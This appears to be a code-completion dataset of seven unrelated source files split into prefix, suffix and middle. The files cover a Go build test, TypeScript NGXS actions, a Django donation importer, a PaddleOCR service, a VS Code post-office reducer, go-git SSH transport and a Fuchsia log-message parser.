formulaFiles := filepath.Join(ritHome, "repos", "local-repo", "testing", "formula", "bin")
files, err := fileManager.List(formulaFiles)
if err == nil && len(files) != 4 {
t.Errorf("Build(%s) did not generate bin files", tt.name)
}
configFile := filepath.Join(ritHome, "repos", "local-repo", "testing", "formula", "config.json")
hasConfigFile := fileManager.Exists(configFile)
if !hasConfigFile {
t.Errorf("Build(%s) did not copy formula config", tt.name)
}
}
})
}
}
type dirManagerMock struct {
data []string
createErr error
listErr error
copyErr error
removeErr error
}
func (d dirManagerMock) Create(string) error {
return d.createErr
}
func (d dirManagerMock) List(string, bool) ([]string, error) {
return d.data, d.listErr
}
func (d dirManagerMock) Copy(string, string) error {
return d.copyErr
}
func (d dirManagerMock) Remove(string) error {
return d.removeErr
}
type repoAdderMock struct {
err error
}
func (r repoAdderMock) Add(repo formula.Repo) error {
return r.err
}
| TestBuild |
orgs.actions.ts | import { OrganizationRequest, Project, UpdateMembersRequest } from '@compito/api-interfaces';
export namespace OrgsAction {
export class | {
static readonly type = '[Orgs] Add org';
constructor(public payload: OrganizationRequest) {}
}
export class AddProject {
static readonly type = '[Orgs] Add project';
constructor(public payload: Project, public orgId: string) {}
}
export class DeleteProject {
static readonly type = '[Orgs] Delete project';
constructor(public projectId: string, public orgId: string) {}
}
export class Update {
static readonly type = '[Orgs] Update Org';
constructor(public id: string, public payload: OrganizationRequest) {}
}
export class Delete {
static readonly type = '[Orgs] Delete Org';
constructor(public id: string) {}
}
export class GetAll {
static readonly type = '[Orgs] Get All';
}
export class GetInvites {
static readonly type = '[Orgs] Get Invites';
}
export class AcceptInvite {
static readonly type = '[Orgs] Accept Invites';
constructor(public id: string) {}
}
export class RejectInvite {
static readonly type = '[Orgs] Reject Invites';
constructor(public id: string) {}
}
export class UpdateMembers {
static readonly type = '[Orgs] Update members';
constructor(public id: string, public payload: UpdateMembersRequest) {}
}
export class Get {
static readonly type = '[Orgs] Get org';
constructor(public id: string) {}
}
}
| Add |
historical_data_importer.py | import re
from dateutil.parser import parse
from django.utils import timezone as tz
from .base_csv_importer import BaseCsvImporter
from app.constants.item_map import ITEM_MAP
from app.enums import ItemStatusEnum
from app.models import Donor, Donation, Item, ItemDevice, ItemDeviceType
class HistoricalDataImporter(BaseCsvImporter):
"""Takes 10b format file path and imports into the database using the 10x
format into the appropriate tables.
:param str csvfile: csvfile path
"""
bulk_model = Item
def parse_row(self, row):
donor = self._goc_donor(self._parse_donor(row))
donation = self._goc_donation(self._parse_donation(row), donor)
device_type = self._goc_device_type(self._parse_device_type(row))
device = self._goc_item_device(
self._parse_item_device(row), device_type)
self.model_bulk.append(
self._new_item(self._parse_item(row), donation, device))
def _parse_donor(self, row):
"""Takes a row and parses relevant Donor data into a dict.
:param dict row: A CSV row dict
:return: Donor related data dict
:rtype: dict
"""
receipt_option_f = {
"notneeded": "REFUSED",
"email": "EMAIL",
"mail": "MAIL"
}.get(re.sub("[^a-zA-Z]+", "", row["TRV"]).lower(), "EMAIL")
documented_at_f = self._parse_date(row["Date"])
postal_f = re.sub("[^a-zA-Z0-9 ]+", "", row["Postal Code"]).upper()[:7]
return {
"donor_name": row["Donor Name"],
"contact_name": row.get("Contact", row["Donor Name"]),
"email": row["Email"],
"want_receipt": receipt_option_f,
"telephone_number": row["Telephone"],
"mobile_number": row["Mobile"],
"address_line_one": row["Address"],
"address_line_two": row.get("Unit", ""),
"city": row["City"],
"province": row["Prov."],
"postal_code": postal_f,
"customer_ref": row["CustRef"],
"documented_at": documented_at_f
}
def _parse_donation(self, row):
"""Takes a csv row and parses relevant Donation data into a dict.
:param dict row: A CSV row dict
:return: Donation related data dict
:rtype: dict
"""
donate_date_f = documented_at_f = self._parse_date(row["Date"])
return {
"tax_receipt_no": row["TR#"],
"pledge_date": donate_date_f,
"donate_date": donate_date_f,
"test_date": donate_date_f,
"valuation_date": donate_date_f,
"pick_up": row["PPC"],
"source": "HISTORICAL_DATA", # Fixed
"documented_at": documented_at_f,
"tax_receipt_created_at": tz.now()
}
def _parse_device_type(self, row):
"""Takes a csv row and parses relevant ItemDeviceType data into a dict.
:param dict row: A CSV row dict
:return: ItemDeviceType related data dict
:rtype: dict
"""
dtype = ITEM_MAP.get(row["Item Description"].lower(), None)
if dtype is None:
return {
"category": "not categorized",
"device_type": row["Item Description"],
}
return dtype
def _parse_item_device(self, row):
"""Takes a csv row and parses relevant ItemDevice data into a dict.
:param dict row: A CSV row dict
:return: ItemDevice related data dict
:rtype: dict
"""
return {
"make": row["Manufacturer"],
"model": row["Model"],
"cpu_type": "",
"speed": "",
"memory": None,
"hd_size": None,
"screen_size": "",
"hdd_serial_number": "",
"operating_system": ""
}
def _parse_item(self, row):
"""Takes a csv row and parses relevant Item data into a dict.
:param dict row: A CSV row dict
:return: Item related data dict
:rtype: dict
"""
working_f = row["Working"].lower() == "y"
donate_date_f = documented_at_f = self._parse_date(row["Date"])
batch_f = "" if row["Batch"] == "0" else row["Batch"]
particulars_f = row["Item Particulars"]
if particulars_f == "0":
particulars_f = ""
qty_f = int(row.get("Qty", 0))
try:
value_f = float(re.sub("[^0-9|.]", "", row["Value"]))
except ValueError:
value_f = 0.0
value_per_f = round(value_f / qty_f, 2)
return {
"serial_number": "",
"asset_tag": "",
"particulars": particulars_f, | "quantity": row["Qty"],
"working": working_f,
"condition": row["Condition"],
"quality": row["Quality"],
"batch": batch_f,
"value": str(value_per_f),
"verified": True,
"documented_at": documented_at_f,
"status": ItemStatusEnum.RECEIVED.name,
"notes": particulars_f,
"valuation_date": donate_date_f,
# "weight":
# "valuation_supporting_doc":
}
def _goc_donor(self, data):
"""get_or_create a Donor.
:param dict row: A Donor dict
:return: Donor object
:rtype: app.models.Donor instance
"""
try:
donor = Donor.objects.filter(
donor_name=data['donor_name'],
contact_name=data['contact_name'],
email=data['email'],
want_receipt=data['want_receipt'],
telephone_number=data['telephone_number'],
mobile_number=data['mobile_number'],
address_line_one=data['address_line_one'],
address_line_two=data['address_line_two'],
city=data['city'],
province=data['province'],
postal_code=data['postal_code'],
).first()
if donor is None:
raise Donor.DoesNotExist
except Exception:
donor = Donor.objects.create(**data)
return donor
def _goc_donation(self, data, donor):
"""get_or_create a Donation.
:param dict row: A Donation dict
:param obj donor: app.model.Donor object
:return: Donation object
:rtype: app.models.Donation instance
"""
try:
# Match by tax receipt number rather than full donation data
d = Donation.objects.get(tax_receipt_no=data.get("tax_receipt_no"))
except Exception:
d = Donation.objects.create(donor=donor, **data)
return d
def _goc_device_type(self, data):
"""get_or_create a ItemDeviceType.
:param dict row: A ItemDeviceType dict
:return: ItemDeviceType object
:rtype: app.models.ItemDeviceType instance
"""
dtype, unique = ItemDeviceType.objects.get_or_create(**data)
return dtype
def _goc_item_device(self, data, dtype):
"""get_or_create a ItemDevice.
:param dict row: A ItemDevice dict
:param obj device_type: app.model.ItemDeviceType object
:return: ItemDevice object
:rtype: app.models.ItemDevice instance
"""
i, unique = ItemDevice.objects.get_or_create(dtype=dtype, **data)
return i
def _new_item(self, data, donation, device):
"""Initialize a new Item object.
:param dict row: A Item dict
:param obj donation: app.model.Donation object
:param obj device: app.model.ItemDevice object
:return: Item object
:rtype: app.models.Item instance
"""
try:
i = Item(donation=donation, device=device, **data)
i.clean_fields()
except Exception as e:
self.logger.error(f"Item Data: {i.underscore_serialize()}")
raise e
return i
@staticmethod
def _parse_date(date_f):
""" Takes dynamic date formats and unifies them into Y-m-d format
"""
date = parse(date_f, dayfirst=True)
return date.strftime('%Y-%m-%d') | |
ocr_local_server.py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from paddle_serving_client import Client
from paddle_serving_app.reader import OCRReader
import cv2
import sys
import numpy as np
import os
from paddle_serving_client import Client
from paddle_serving_app.reader import Sequential, URL2Image, ResizeByFactor
from paddle_serving_app.reader import Div, Normalize, Transpose
from paddle_serving_app.reader import DBPostProcess, FilterBoxes, GetRotateCropImage, SortedBoxes
if sys.argv[1] == 'gpu':
from paddle_serving_server_gpu.web_service import WebService
elif sys.argv[1] == 'cpu':
from paddle_serving_server.web_service import WebService
from paddle_serving_app.local_predict import Debugger
import time
import re
import base64
class OCRService(WebService):
def init_det_debugger(self, det_model_config):
self.det_preprocess = Sequential([
ResizeByFactor(32, 960), Div(255),
Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]), Transpose(
(2, 0, 1))
])
self.det_client = Debugger()
if sys.argv[1] == 'gpu':
self.det_client.load_model_config(
det_model_config, gpu=True, profile=False)
elif sys.argv[1] == 'cpu':
self.det_client.load_model_config(
det_model_config, gpu=False, profile=False)
self.ocr_reader = OCRReader()
def preprocess(self, feed=[], fetch=[]):
data = base64.b64decode(feed[0]["image"].encode('utf8'))
data = np.fromstring(data, np.uint8)
im = cv2.imdecode(data, cv2.IMREAD_COLOR)
ori_h, ori_w, _ = im.shape
det_img = self.det_preprocess(im)
_, new_h, new_w = det_img.shape
det_img = det_img[np.newaxis, :]
det_img = det_img.copy()
det_out = self.det_client.predict(
feed={"image": det_img}, fetch=["concat_1.tmp_0"])
filter_func = FilterBoxes(10, 10)
post_func = DBPostProcess({
"thresh": 0.3,
"box_thresh": 0.5,
"max_candidates": 1000,
"unclip_ratio": 1.5,
"min_size": 3
})
sorted_boxes = SortedBoxes()
ratio_list = [float(new_h) / ori_h, float(new_w) / ori_w]
dt_boxes_list = post_func(det_out["concat_1.tmp_0"], [ratio_list])
dt_boxes = filter_func(dt_boxes_list[0], [ori_h, ori_w])
dt_boxes = sorted_boxes(dt_boxes)
get_rotate_crop_image = GetRotateCropImage()
img_list = []
max_wh_ratio = 0
for i, dtbox in enumerate(dt_boxes):
boximg = get_rotate_crop_image(im, dt_boxes[i])
img_list.append(boximg)
h, w = boximg.shape[0:2]
wh_ratio = w * 1.0 / h
max_wh_ratio = max(max_wh_ratio, wh_ratio)
if len(img_list) == 0:
return [], []
_, w, h = self.ocr_reader.resize_norm_img(img_list[0],
max_wh_ratio).shape
imgs = np.zeros((len(img_list), 3, w, h)).astype('float32')
for id, img in enumerate(img_list):
norm_img = self.ocr_reader.resize_norm_img(img, max_wh_ratio)
imgs[id] = norm_img
feed = {"image": imgs.copy()}
fetch = ["ctc_greedy_decoder_0.tmp_0", "softmax_0.tmp_0"]
return feed, fetch
def postprocess(self, feed={}, fetch=[], fetch_map=None):
|
ocr_service = OCRService(name="ocr")
ocr_service.load_model_config("ocr_rec_model")
ocr_service.prepare_server(workdir="workdir", port=9292)
ocr_service.init_det_debugger(det_model_config="ocr_det_model")
if sys.argv[1] == 'gpu':
ocr_service.run_debugger_service(gpu=True)
elif sys.argv[1] == 'cpu':
ocr_service.run_debugger_service()
ocr_service.run_web_service()
| rec_res = self.ocr_reader.postprocess(fetch_map, with_score=True)
res_lst = []
for res in rec_res:
res_lst.append(res[0])
res = {"res": res_lst}
return res |
postOffice.ts | // Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License.
'use strict';
import * as Redux from 'redux';
import {
IInteractiveWindowMapping,
InteractiveWindowMessages
} from '../../../client/datascience/interactive-common/interactiveWindowTypes';
import { CssMessages, SharedMessages } from '../../../client/datascience/messages';
import { PostOffice } from '../../react-common/postOffice';
// Action types for Incoming messages. Basically all possible messages prefixed with the word 'action'
// This allows us to have a reducer for an incoming message and a separate reducer for an outgoing message.
// Note: Couldn't figure out a way to just generate this from the keys of the InteractiveWindowMessages.
// String literals can't come from a concat of another
export enum IncomingMessageActions {
// tslint:disable-next-line: prefer-template
STARTCELL = 'action.start_cell',
FINISHCELL = 'action.finish_cell',
UPDATECELL = 'action.update_cell',
GOTOCODECELL = 'action.gotocell_code',
COPYCODECELL = 'action.copycell_code',
RESTARTKERNEL = 'action.restart_kernel',
EXPORT = 'action.export_to_ipynb',
GETALLCELLS = 'action.get_all_cells',
RETURNALLCELLS = 'action.return_all_cells',
DELETECELL = 'action.delete_cell',
DELETEALLCELLS = 'action.delete_all_cells',
UNDO = 'action.undo',
REDO = 'action.redo',
EXPANDALL = 'action.expand_all',
COLLAPSEALL = 'action.collapse_all',
STARTPROGRESS = 'action.start_progress',
STOPPROGRESS = 'action.stop_progress',
INTERRUPT = 'action.interrupt',
SUBMITNEWCELL = 'action.submit_new_cell',
UPDATESETTINGS = 'action.update_settings',
DOSAVE = 'action.DoSave',
SENDINFO = 'action.send_info',
STARTED = 'action.started',
ADDEDSYSINFO = 'action.added_sys_info',
REMOTEADDCODE = 'action.remote_add_code',
REMOTEREEXECUTECODE = 'action.remote_reexecute_code',
ACTIVATE = 'action.activate',
SHOWDATAVIEWER = 'action.show_data_explorer',
GETVARIABLESREQUEST = 'ACTION.GET_VARIABLES_REQUEST',
GETVARIABLESRESPONSE = 'action.get_variables_response',
GETVARIABLEVALUEREQUEST = 'action.get_variable_value_request',
GETVARIABLEVALUERESPONSE = 'action.get_variable_value_response',
VARIABLEEXPLORERTOGGLE = 'action.variable_explorer_toggle',
PROVIDECOMPLETIONITEMSREQUEST = 'action.provide_completion_items_request',
CANCELCOMPLETIONITEMSREQUEST = 'action.cancel_completion_items_request',
PROVIDECOMPLETIONITEMSRESPONSE = 'action.provide_completion_items_response',
PROVIDEHOVERREQUEST = 'action.provide_hover_request',
CANCELHOVERREQUEST = 'action.cancel_hover_request',
PROVIDEHOVERRESPONSE = 'action.provide_hover_response',
PROVIDESIGNATUREHELPREQUEST = 'action.provide_signature_help_request',
CANCELSIGNATUREHELPREQUEST = 'action.cancel_signature_help_request',
PROVIDESIGNATUREHELPRESPONSE = 'action.provide_signature_help_response',
RESOLVECOMPLETIONITEMREQUEST = 'action.resolve_completion_item_request',
CANCELRESOLVECOMPLETIONITEMREQUEST = 'action.cancel_completion_items_request',
RESOLVECOMPLETIONITEMRESPONSE = 'action.resolve_completion_item_response',
ADDCELL = 'action.add_cell',
EDITCELL = 'action.edit_cell',
REMOVECELL = 'action.remove_cell',
SWAPCELLS = 'action.swap_cells',
INSERTCELL = 'action.insert_cell',
LOADONIGASMASSEMBLYREQUEST = 'action.load_onigasm_assembly_request',
LOADONIGASMASSEMBLYRESPONSE = 'action.load_onigasm_assembly_response',
LOADTMLANGUAGEREQUEST = 'action.load_tmlanguage_request',
LOADTMLANGUAGERESPONSE = 'action.load_tmlanguage_response',
OPENLINK = 'action.open_link',
SHOWPLOT = 'action.show_plot',
STARTDEBUGGING = 'action.start_debugging',
STOPDEBUGGING = 'action.stop_debugging',
GATHERCODE = 'action.gather_code',
LOADALLCELLS = 'action.load_all_cells',
LOADALLCELLSCOMPLETE = 'action.load_all_cells_complete',
SCROLLTOCELL = 'action.scroll_to_cell',
REEXECUTECELL = 'action.reexecute_cell',
NOTEBOOKIDENTITY = 'action.identity',
NOTEBOOKDIRTY = 'action.dirty',
NOTEBOOKCLEAN = 'action.clean',
SAVEALL = 'action.save_all',
NATIVECOMMAND = 'action.native_command',
VARIABLESCOMPLETE = 'action.variables_complete',
NOTEBOOKRUNALLCELLS = 'action.notebook_run_all_cells',
NOTEBOOKRUNSELECTEDCELL = 'action.notebook_run_selected_cell',
NOTEBOOKADDCELLBELOW = 'action.notebook_add_cell_below',
RENDERCOMPLETE = 'action.finished_rendering_cells',
FOCUSEDCELLEDITOR = 'action.focused_cell_editor',
MONACOREADY = 'action.monaco_ready',
GETCSSREQUEST = 'action.get_css_request',
GETCSSRESPONSE = 'action.get_css_response',
GETMONACOTHEMEREQUEST = 'action.get_monaco_theme_request',
GETMONACOTHEMERESPONSE = 'action.get_monaco_theme_response',
UPDATEKERNEL = 'action.update_kernel',
LOCINIT = 'action.loc_init'
}
export const AllowedMessages = [
...Object.values(InteractiveWindowMessages),
...Object.values(CssMessages),
...Object.values(SharedMessages)
];
// Actions created from messages
export function | <M extends IInteractiveWindowMapping, T extends keyof M = keyof M>(
message: T,
payload?: M[T]
): Redux.AnyAction {
return { type: `${message}`, payload };
}
export function generatePostOfficeSendReducer(postOffice: PostOffice): Redux.Reducer<{}, Redux.AnyAction> {
// tslint:disable-next-line: no-function-expression
return function(_state: {} | undefined, action: Redux.AnyAction): {} {
// Make sure a valid message
if (AllowedMessages.find(k => k === action.type)) {
// Just post this to the post office.
// tslint:disable-next-line: no-any
postOffice.sendMessage<IInteractiveWindowMapping>(action.type, action.payload);
}
// We don't modify the state.
return {};
};
}
| createPostableAction |
common.go | // Package ssh implements the SSH transport protocol.
package ssh
import (
"context"
"fmt"
"reflect"
"strconv"
"github.com/dink10/go-git.v4/plumbing/transport"
"github.com/dink10/go-git.v4/plumbing/transport/internal/common"
"github.com/kevinburke/ssh_config"
"golang.org/x/crypto/ssh"
"golang.org/x/net/proxy"
)
// DefaultClient is the default SSH client.
var DefaultClient = NewClient(nil)
// DefaultSSHConfig is the reader used to access parameters stored in the
// system's ssh_config files. If nil all the ssh_config are ignored.
var DefaultSSHConfig sshConfig = ssh_config.DefaultUserSettings
type sshConfig interface {
Get(alias, key string) string
}
// NewClient creates a new SSH client with an optional *ssh.ClientConfig.
func NewClient(config *ssh.ClientConfig) transport.Transport {
return common.NewClient(&runner{config: config})
}
// DefaultAuthBuilder is the function used to create a default AuthMethod, when
// the user doesn't provide any.
var DefaultAuthBuilder = func(user string) (AuthMethod, error) {
return NewSSHAgentAuth(user)
}
const DefaultPort = 22
type runner struct {
config *ssh.ClientConfig
}
func (r *runner) Command(cmd string, ep *transport.Endpoint, auth transport.AuthMethod) (common.Command, error) {
c := &command{command: cmd, endpoint: ep, config: r.config}
if auth != nil {
c.setAuth(auth)
}
if err := c.connect(); err != nil {
return nil, err
}
return c, nil
}
type command struct {
*ssh.Session
connected bool
command string
endpoint *transport.Endpoint
client *ssh.Client
auth AuthMethod
config *ssh.ClientConfig
}
func (c *command) setAuth(auth transport.AuthMethod) error {
a, ok := auth.(AuthMethod)
if !ok {
return transport.ErrInvalidAuthMethod
}
c.auth = a
return nil
}
func (c *command) Start() error {
return c.Session.Start(endpointToCommand(c.command, c.endpoint))
}
// Close closes the SSH session and connection.
func (c *command) Close() error {
if !c.connected {
return nil
}
c.connected = false
//XXX: If did read the full packfile, then the session might be already
// closed.
_ = c.Session.Close()
return c.client.Close()
}
// connect connects to the SSH server, unless a AuthMethod was set with
// SetAuth method, by default uses an auth method based on PublicKeysCallback,
// it connects to a SSH agent, using the address stored in the SSH_AUTH_SOCK
// environment var.
func (c *command) connect() error {
if c.connected {
return transport.ErrAlreadyConnected
}
if c.auth == nil {
if err := c.setAuthFromEndpoint(); err != nil {
return err
}
}
var err error
config, err := c.auth.ClientConfig()
if err != nil {
return err
}
overrideConfig(c.config, config)
c.client, err = dial("tcp", c.getHostWithPort(), config)
if err != nil {
return err
}
c.Session, err = c.client.NewSession()
if err != nil {
_ = c.client.Close()
return err
}
c.connected = true
return nil
}
func dial(network, addr string, config *ssh.ClientConfig) (*ssh.Client, error) {
var (
ctx = context.Background()
cancel context.CancelFunc
)
if config.Timeout > 0 {
ctx, cancel = context.WithTimeout(ctx, config.Timeout)
} else {
ctx, cancel = context.WithCancel(ctx)
}
defer cancel()
conn, err := proxy.Dial(ctx, network, addr)
if err != nil {
return nil, err
}
c, chans, reqs, err := ssh.NewClientConn(conn, addr, config)
if err != nil {
return nil, err
}
return ssh.NewClient(c, chans, reqs), nil
}
func (c *command) getHostWithPort() string {
if addr, found := c.doGetHostWithPortFromSSHConfig(); found {
return addr
}
host := c.endpoint.Host
port := c.endpoint.Port
if port <= 0 {
port = DefaultPort
}
return fmt.Sprintf("%s:%d", host, port)
}
func (c *command) doGetHostWithPortFromSSHConfig() (addr string, found bool) {
if DefaultSSHConfig == nil {
return
}
host := c.endpoint.Host
port := c.endpoint.Port
configHost := DefaultSSHConfig.Get(c.endpoint.Host, "Hostname")
if configHost != "" {
host = configHost
found = true
}
if !found {
return
}
configPort := DefaultSSHConfig.Get(c.endpoint.Host, "Port")
if configPort != "" {
if i, err := strconv.Atoi(configPort); err == nil {
port = i
}
}
addr = fmt.Sprintf("%s:%d", host, port)
return
}
func (c *command) setAuthFromEndpoint() error {
var err error
c.auth, err = DefaultAuthBuilder(c.endpoint.User)
return err
}
func endpointToCommand(cmd string, ep *transport.Endpoint) string {
return fmt.Sprintf("%s '%s'", cmd, ep.Path)
}
func overrideConfig(overrides *ssh.ClientConfig, c *ssh.ClientConfig) | {
if overrides == nil {
return
}
t := reflect.TypeOf(*c)
vc := reflect.ValueOf(c).Elem()
vo := reflect.ValueOf(overrides).Elem()
for i := 0; i < t.NumField(); i++ {
f := t.Field(i)
vcf := vc.FieldByName(f.Name)
vof := vo.FieldByName(f.Name)
vcf.Set(vof)
}
*c = vc.Interface().(ssh.ClientConfig)
} |
|
message.rs | // Copyright 2020 The Fuchsia Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be found in the LICENSE file.
use super::buffer::Accounted;
use super::error::StreamError;
use byteorder::{ByteOrder, LittleEndian};
use fidl_fuchsia_logger::LogMessage;
use fuchsia_zircon as zx;
use libc::{c_char, c_int};
use std::{mem, str};
pub const METADATA_SIZE: usize = mem::size_of::<fx_log_metadata_t>();
pub const MIN_PACKET_SIZE: usize = METADATA_SIZE + 1;
pub const MAX_DATAGRAM_LEN: usize = 2032;
pub const MAX_TAGS: usize = 5;
pub const MAX_TAG_LEN: usize = 64;
/// A type-safe(r) [`LogMessage`].
///
/// [`LogMessage`]: https://fuchsia.dev/reference/fidl/fuchsia.logger#LogMessage
#[derive(Clone, Debug, Eq, PartialEq)]
pub struct Message {
/// Size this message took up on the wire.
pub size: usize,
/// Message severity reported by the writer.
pub severity: fx_log_severity_t,
/// Timestamp reported by the writer.
pub time: zx::Time,
/// Process koid as reported by the writer.
pub pid: zx::sys::zx_koid_t,
/// Thread koid as reported by the writer.
pub tid: zx::sys::zx_koid_t,
/// Number of logs the writer had to drop before writing this message.
pub dropped_logs: usize,
/// Tags annotating the context or semantics of this message.
pub tags: Vec<String>,
/// The message's string contents.
pub contents: String,
}
impl Accounted for Message {
fn bytes_used(&self) -> usize {
self.size
}
}
impl Message {
/// Parse the provided buffer as if it implements the [logger/syslog wire format].
///
/// Note that this is distinct from the parsing we perform for the debuglog log, which aslo
/// takes a `&[u8]` and is why we don't implement this as `TryFrom`.
///
/// [logger/syslog wire format]: https://fuchsia.googlesource.com/fuchsia/+/master/zircon/system/ulib/syslog/include/lib/syslog/wire_format.h
pub(super) fn from_logger(bytes: &[u8]) -> Result<Self, StreamError> {
if bytes.len() < MIN_PACKET_SIZE {
return Err(StreamError::ShortRead { len: bytes.len() });
}
let terminator = bytes[bytes.len() - 1];
if terminator != 0 {
return Err(StreamError::NotNullTerminated { terminator });
}
let pid = LittleEndian::read_u64(&bytes[..8]);
let tid = LittleEndian::read_u64(&bytes[8..16]);
let time = zx::Time::from_nanos(LittleEndian::read_i64(&bytes[16..24]));
let severity = LittleEndian::read_i32(&bytes[24..28]);
let dropped_logs = LittleEndian::read_u32(&bytes[28..METADATA_SIZE]) as usize;
// start reading tags after the header
let mut cursor = METADATA_SIZE;
let mut tag_len = bytes[cursor] as usize;
let mut tags = Vec::new();
while tag_len != 0 {
if tags.len() == MAX_TAGS {
return Err(StreamError::TooManyTags);
}
if tag_len > MAX_TAG_LEN - 1 {
return Err(StreamError::TagTooLong { index: tags.len(), len: tag_len });
}
if (cursor + tag_len + 1) > bytes.len() {
return Err(StreamError::OutOfBounds);
}
let tag_start = cursor + 1;
let tag_end = tag_start + tag_len;
let tag = str::from_utf8(&bytes[tag_start..tag_end])?;
tags.push(tag.to_owned());
cursor = tag_end;
tag_len = bytes[cursor] as usize;
}
let msg_start = cursor + 1;
let mut msg_end = cursor + 1;
while msg_end < bytes.len() {
if bytes[msg_end] == 0 {
let contents = str::from_utf8(&bytes[msg_start..msg_end])?.to_owned();
return Ok(Self {
size: cursor + contents.len() + 1,
tags,
contents,
pid,
tid,
time,
severity,
dropped_logs,
});
}
msg_end += 1;
}
Err(StreamError::OutOfBounds)
}
/// Convert this `Message` to a FIDL representation suitable for sending to `LogListenerSafe`.
pub fn for_listener(&self) -> LogMessage {
LogMessage {
pid: self.pid,
tid: self.tid,
time: self.time.into_nanos(),
severity: self.severity,
dropped_logs: self.dropped_logs as _,
tags: self.tags.clone(),
msg: self.contents.clone(),
}
}
}
#[allow(non_camel_case_types)]
type fx_log_severity_t = c_int;
#[repr(C)]
#[derive(Debug, Copy, Clone, Default, Eq, PartialEq)]
pub struct fx_log_metadata_t {
pub pid: zx::sys::zx_koid_t,
pub tid: zx::sys::zx_koid_t,
pub time: zx::sys::zx_time_t,
pub severity: fx_log_severity_t,
pub dropped_logs: u32,
}
#[repr(C)]
#[derive(Clone)]
pub struct fx_log_packet_t {
pub metadata: fx_log_metadata_t,
// Contains concatenated tags and message and a null terminating character at
// the end.
// char(tag_len) + "tag1" + char(tag_len) + "tag2\0msg\0"
pub data: [c_char; MAX_DATAGRAM_LEN - METADATA_SIZE],
}
impl Default for fx_log_packet_t {
fn default() -> fx_log_packet_t {
fx_log_packet_t {
data: [0; MAX_DATAGRAM_LEN - METADATA_SIZE],
metadata: Default::default(),
}
}
}
#[cfg(test)]
impl fx_log_packet_t {
/// This struct has no padding bytes, but we can't use zerocopy because it needs const
/// generics to support arrays this large.
pub(super) fn as_bytes(&self) -> &[u8] {
unsafe {
std::slice::from_raw_parts(
(self as *const Self) as *const u8,
mem::size_of::<fx_log_packet_t>(),
)
}
}
pub(super) fn | (&mut self, region: std::ops::Range<usize>, with: c_char) {
self.data[region].iter_mut().for_each(|c| *c = with);
}
}
#[cfg(test)]
mod tests {
use super::*;
#[repr(C, packed)]
pub struct fx_log_metadata_t_packed {
pub pid: zx::sys::zx_koid_t,
pub tid: zx::sys::zx_koid_t,
pub time: zx::sys::zx_time_t,
pub severity: fx_log_severity_t,
pub dropped_logs: u32,
}
#[repr(C, packed)]
pub struct fx_log_packet_t_packed {
pub metadata: fx_log_metadata_t_packed,
/// Contains concatenated tags and message and a null terminating character at the end.
/// `char(tag_len) + "tag1" + char(tag_len) + "tag2\0msg\0"`
pub data: [c_char; MAX_DATAGRAM_LEN - METADATA_SIZE],
}
#[test]
fn abi_test() {
assert_eq!(METADATA_SIZE, 32);
assert_eq!(MAX_TAGS, 5);
assert_eq!(MAX_TAG_LEN, 64);
assert_eq!(mem::size_of::<fx_log_packet_t>(), MAX_DATAGRAM_LEN);
// Test that there is no padding
assert_eq!(mem::size_of::<fx_log_packet_t>(), mem::size_of::<fx_log_packet_t_packed>());
assert_eq!(mem::size_of::<fx_log_metadata_t>(), mem::size_of::<fx_log_metadata_t_packed>());
}
fn test_packet() -> fx_log_packet_t {
let mut packet: fx_log_packet_t = Default::default();
packet.metadata.pid = 1;
packet.metadata.tid = 2;
packet.metadata.time = 3;
packet.metadata.severity = -1;
packet.metadata.dropped_logs = 10;
packet
}
#[test]
fn short_reads() {
let packet = test_packet();
let one_short = &packet.as_bytes()[..METADATA_SIZE];
let two_short = &packet.as_bytes()[..METADATA_SIZE - 1];
assert_eq!(Message::from_logger(one_short), Err(StreamError::ShortRead { len: 32 }));
assert_eq!(Message::from_logger(two_short), Err(StreamError::ShortRead { len: 31 }));
}
#[test]
fn unterminated() {
let mut packet = test_packet();
let end = 9;
packet.data[end] = 1;
let buffer = &packet.as_bytes()[..MIN_PACKET_SIZE + end];
let parsed = Message::from_logger(buffer);
assert_eq!(parsed, Err(StreamError::NotNullTerminated { terminator: 1 }));
}
#[test]
fn tags_no_message() {
let mut packet = test_packet();
let end = 12;
packet.data[0] = end as c_char - 1;
packet.fill_data(1..end, 'A' as _);
packet.data[end] = 0;
let buffer = &packet.as_bytes()[..MIN_PACKET_SIZE + end]; // omit null-terminated
let parsed = Message::from_logger(buffer);
assert_eq!(parsed, Err(StreamError::OutOfBounds));
}
#[test]
fn tags_with_message() {
let mut packet = test_packet();
let a_start = 1;
let a_count = 11;
let a_end = a_start + a_count;
packet.data[0] = a_count as c_char;
packet.fill_data(a_start..a_end, 'A' as _);
packet.data[a_end] = 0; // terminate tags
let b_start = a_start + a_count + 1;
let b_count = 5;
let b_end = b_start + b_count;
packet.fill_data(b_start..b_end, 'B' as _);
let data_size = b_start + b_count;
let buffer = &packet.as_bytes()[..METADATA_SIZE + data_size + 1]; // null-terminate message
let parsed = Message::from_logger(buffer).unwrap();
assert_eq!(
parsed,
Message {
size: METADATA_SIZE + data_size,
pid: packet.metadata.pid,
tid: packet.metadata.tid,
time: zx::Time::from_nanos(packet.metadata.time),
severity: packet.metadata.severity,
dropped_logs: packet.metadata.dropped_logs as usize,
tags: vec![String::from("AAAAAAAAAAA")],
contents: String::from("BBBBB"),
}
);
}
#[test]
fn two_tags_no_message() {
let mut packet = test_packet();
let a_start = 1;
let a_count = 11;
let a_end = a_start + a_count;
packet.data[0] = a_count as c_char;
packet.fill_data(a_start..a_end, 'A' as _);
let b_start = a_end + 1;
let b_count = 5;
let b_end = b_start + b_count;
packet.data[a_end] = b_count as c_char;
packet.fill_data(b_start..b_end, 'B' as _);
let buffer = &packet.as_bytes()[..MIN_PACKET_SIZE + b_end];
let parsed = Message::from_logger(buffer);
assert_eq!(parsed, Err(StreamError::OutOfBounds));
}
#[test]
fn two_tags_with_message() {
let mut packet = test_packet();
let a_start = 1;
let a_count = 11;
let a_end = a_start + a_count;
packet.data[0] = a_count as c_char;
packet.fill_data(a_start..a_end, 'A' as _);
let b_start = a_end + 1;
let b_count = 5;
